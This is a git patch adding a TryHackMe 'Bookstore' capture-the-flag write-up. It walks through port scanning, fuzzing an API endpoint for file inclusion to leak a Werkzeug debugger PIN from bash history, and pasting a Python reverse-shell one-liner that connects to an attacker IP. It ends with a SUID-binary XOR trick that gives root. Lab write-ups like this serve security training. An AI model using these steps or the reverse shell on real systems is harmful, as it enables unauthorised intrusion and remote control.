From 544ced23904a3fb26213871f1362790b879ff9b3 Mon Sep 17 00:00:00 2001
From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sun, 29 Nov 2020 00:11:01 +0500
Subject: [PATCH] Add files via upload
---
TryHackMe/Bookstore.md | 144 +++++++++++++++++++++++++++++++++++++++++
1 file changed, 144 insertions(+)
create mode 100644 TryHackMe/Bookstore.md
diff --git a/TryHackMe/Bookstore.md b/TryHackMe/Bookstore.md
new file mode 100644
index 0000000..40836f4
--- /dev/null
+++ b/TryHackMe/Bookstore.md
@@ -0,0 +1,144 @@
+# TryHackMe-Bookstore
+
+## NMAP
+
+```
+Nmap scan report for 10.10.117.123
+Host is up (0.15s latency).
+Not shown: 65532 closed ports
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA)
+| 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA)
+|_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519)
+80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Book Store
+5000/tcp open http Werkzeug httpd 0.14.1 (Python 3.6.9)
+| http-robots.txt: 1 disallowed entry
+|_/api
+|_http-title: Home
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 1323.85 seconds
+
+```
+
+## PORT 80
+
+
+
+## PORT 5000
+
+
+
+As we saw from nmap scan that there is a `robots.txt` file at port 5000
+
+
+
+
+
+Running gobuster on this port we see a console a type of debugger
+
+
+
+
+
+But it's asking for a PIN.
+
+I found a metasploit exploit for it but it didn't worked
+
+
+
+Going back to port 80 and then looking at the login page source we find that PIN is in bash history file of user `sid`.
+
+We know there are two versions of api v1 and v2 , v1 is likely to be vulnerable to LFI so let's choose the endpoint that has a parameter
+
+`/api/v2/resources/books?id=1`
+
+Change this to
+
+`/api/v1/resources/books?id=.bash_history`
+
+then put it in `wfuzz`
+
+### Wfuzz
+
+```
+wfuzz -u http://10.10.117.123:5000/api/v1/resources/books\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404
+```
+
+Here
+
+`-u` the host with the api-endpoint
+`?FUZZ` here ? is before the paramter and "FUZZ" is the location where we want to find the paramter
+`--hc` is telling to hide status codes like 404 which is not found
+
+
+
+
+
+```
+cd /home/sid whoami export WERKZEUG_DEBUG_PIN=123-321-135 echo $WERKZEUG_DEBUG_PIN python3 /home/sid/api.py ls exit
+```
+
+
+
+And now we can interact with the debugger also in order to get into the box we have to paste a reverse shell there
+
+```
+import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.209.100",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
+
+```
+Paste this on to the debugger and set your netcat listener
+
+
+
+
+## Privlege Escalation
+
+
+
+
+We see a binary which has a SUID on it so it can run as a root but we need to figure out what it is doing and how we can execute it properly to get root
+
+
+On analyzing the binary with `ghidra`
+
+
+
+? ----> local_1c is the number we are going to input
+4374 ---->
+23987 ---> local_18
+
+local_14 has to be this number 1573724660
+
+I have converted those hexadecimal number to decimal to get a better understanding
+
+
+`local_14 = local_1c ^ 4374 ^ local_18`
+
+
+What's happening in here is that these three values are getting through and exclusive OR operator `^` .We don't know what value we put inorder to get `1573724660`.
+
+So I'll convert hex values to decimal and XOR between them
+
+```
+1573724660 ^ 4374 ^ local_18
+
+1573724660 ^ 4374 ^ 23987
+
+1573724660 ^ 19621
+
+1573743953
+
+```
+
+
+Let's try the final result we got
+
+
+
+And we are root !
\ No newline at end of file